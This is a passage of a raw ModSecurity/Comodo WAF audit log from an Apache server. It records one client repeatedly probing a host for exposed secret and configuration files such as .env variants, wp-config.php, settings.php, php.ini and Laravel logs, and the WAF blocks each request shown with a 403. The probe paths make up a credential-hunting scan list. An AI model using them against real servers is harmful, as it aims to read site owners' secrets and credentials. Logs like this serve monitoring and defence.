"TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873384425530 2372 (- - -) Stopwatch2: 1745873384425530 2372; combined=877, p1=395, p2=453, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39929a3e-Z-- --50097b7c-A-- [29/Apr/2025:03:49:48 +0700] aA_p7MDCAfZpkPvVAPOdHQAAAJI 103.236.140.4 47884 103.236.140.4 8181 --50097b7c-B-- GET /docker/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --50097b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50097b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873388242097 687 (- - -) Stopwatch2: 1745873388242097 687; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50097b7c-Z-- --aaf5eb6a-A-- [29/Apr/2025:03:49:48 +0700] aA_p7AW3ctMdWeqW3LOhKAAAAFY 103.236.140.4 47890 103.236.140.4 8181 --aaf5eb6a-B-- GET /wp-config.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --aaf5eb6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaf5eb6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873388438059 1018 (- - -) Stopwatch2: 1745873388438059 1018; combined=372, p1=334, p2=0, p3=0, p4=0, p5=38, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaf5eb6a-Z-- --0cd65e63-A-- [29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLQAAAEE 103.236.140.4 47902 103.236.140.4 8181 --0cd65e63-B-- GET /env.backup HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0cd65e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cd65e63-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873390450586 1777 (- - -) Stopwatch2: 1745873390450586 1777; combined=692, p1=357, p2=309, p3=0, p4=0, p5=26, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cd65e63-Z-- --cbab8828-A-- [29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLwAAAEU 103.236.140.4 47908 103.236.140.4 8181 --cbab8828-B-- GET /settings.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cbab8828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbab8828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873390647723 2533 (- - -) Stopwatch2: 1745873390647723 2533; combined=920, p1=481, p2=410, p3=0, p4=0, p5=29, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbab8828-Z-- --bd1b9473-A-- [29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhMQAAAEc 103.236.140.4 47912 103.236.140.4 8181 --bd1b9473-B-- GET /old/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bd1b9473-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1b9473-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873391050601 688 (- - -) Stopwatch2: 1745873391050601 688; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1b9473-Z-- --f0ad395d-A-- [29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhNgAAAFE 103.236.140.4 47924 103.236.140.4 8181 --f0ad395d-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f0ad395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0ad395d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873391849184 751 (- - -) Stopwatch2: 1745873391849184 751; combined=327, p1=292, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0ad395d-Z-- --3c3dff24-A-- [29/Apr/2025:03:49:52 +0700] aA_p8AW3ctMdWeqW3LOhNwAAAFA 103.236.140.4 47926 103.236.140.4 8181 --3c3dff24-B-- GET /app/config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3c3dff24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3dff24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873392045505 683 (- - -) Stopwatch2: 1745873392045505 683; combined=280, p1=252, p2=0, p3=0, p4=0, p5=27, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3dff24-Z-- --f764235b-A-- [29/Apr/2025:03:49:53 +0700] aA_p8QW3ctMdWeqW3LOhOQAAAFQ 103.236.140.4 47932 103.236.140.4 8181 --f764235b-B-- GET /.gitignore HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f764235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f764235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873393233703 813 (- - -) Stopwatch2: 1745873393233703 813; combined=341, p1=293, p2=0, p3=0, p4=0, p5=48, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f764235b-Z-- --405fd031-A-- [29/Apr/2025:03:49:55 +0700] aA_p8wW3ctMdWeqW3LOhPwAAAEM 103.236.140.4 47948 103.236.140.4 8181 --405fd031-B-- GET /sites/default/settings.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --405fd031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --405fd031-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873395299145 716 (- - -) Stopwatch2: 1745873395299145 716; combined=316, p1=285, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405fd031-Z-- --4568f921-A-- [29/Apr/2025:03:49:56 +0700] aA_p9AW3ctMdWeqW3LOhRQAAAE0 103.236.140.4 47962 103.236.140.4 8181 --4568f921-B-- GET /php.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4568f921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4568f921-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873396314328 1837 (- - -) Stopwatch2: 1745873396314328 1837; combined=685, p1=356, p2=295, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4568f921-Z-- --1338b36d-A-- [29/Apr/2025:03:49:58 +0700] aA_p9gW3ctMdWeqW3LOhUAAAAEc 103.236.140.4 47992 103.236.140.4 8181 --1338b36d-B-- GET /public/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1338b36d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1338b36d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873398620697 661 (- - -) Stopwatch2: 1745873398620697 661; combined=271, p1=244, p2=0, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1338b36d-Z-- --487c3a50-A-- [29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVAAAAEw 103.236.140.4 48004 103.236.140.4 8181 --487c3a50-B-- GET /composer.json HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --487c3a50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487c3a50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/composer.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873400337503 832 (- - -) Stopwatch2: 1745873400337503 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487c3a50-Z-- --d7ccbb56-A-- [29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVQAAAE0 103.236.140.4 48006 103.236.140.4 8181 --d7ccbb56-B-- GET /api/v1/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d7ccbb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7ccbb56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873400533705 670 (- - -) Stopwatch2: 1745873400533705 670; combined=274, p1=243, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7ccbb56-Z-- --a9d64f50-A-- [29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWQAAAFA 103.236.140.4 48018 103.236.140.4 8181 --a9d64f50-B-- GET /.env.example HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a9d64f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d64f50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873401327496 635 (- - -) Stopwatch2: 1745873401327496 635; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d64f50-Z-- --84ba7801-A-- [29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWgAAAFI 103.236.140.4 48020 103.236.140.4 8181 --84ba7801-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --84ba7801-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84ba7801-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873401523911 1833 (- - -) Stopwatch2: 1745873401523911 1833; combined=766, p1=374, p2=365, p3=0, p4=0, p5=26, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84ba7801-Z-- --51171775-A-- [29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIAAAAIM 103.236.140.4 48038 103.236.140.4 8181 --51171775-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --51171775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51171775-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873403786527 812 (- - -) Stopwatch2: 1745873403786527 812; combined=314, p1=275, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51171775-Z-- --94b2c370-A-- [29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIgAAAIA 103.236.140.4 48044 103.236.140.4 8181 --94b2c370-B-- GET /.env.dev HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --94b2c370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94b2c370-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873403982533 740 (- - -) Stopwatch2: 1745873403982533 740; combined=320, p1=286, p2=0, p3=0, p4=0, p5=33, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94b2c370-Z-- --d7ccbb56-A-- [29/Apr/2025:03:50:04 +0700] aA_p_MDCAfZpkPvVAPOdIwAAAII 103.236.140.4 48046 103.236.140.4 8181 --d7ccbb56-B-- GET /.env.test HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d7ccbb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7ccbb56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873404180942 752 (- - -) Stopwatch2: 1745873404180942 752; combined=309, p1=274, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7ccbb56-Z-- --be08ba13-A-- [29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXQAAAFY 103.236.140.4 48052 103.236.140.4 8181 --be08ba13-B-- GET /var/logs/dev.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --be08ba13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be08ba13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag 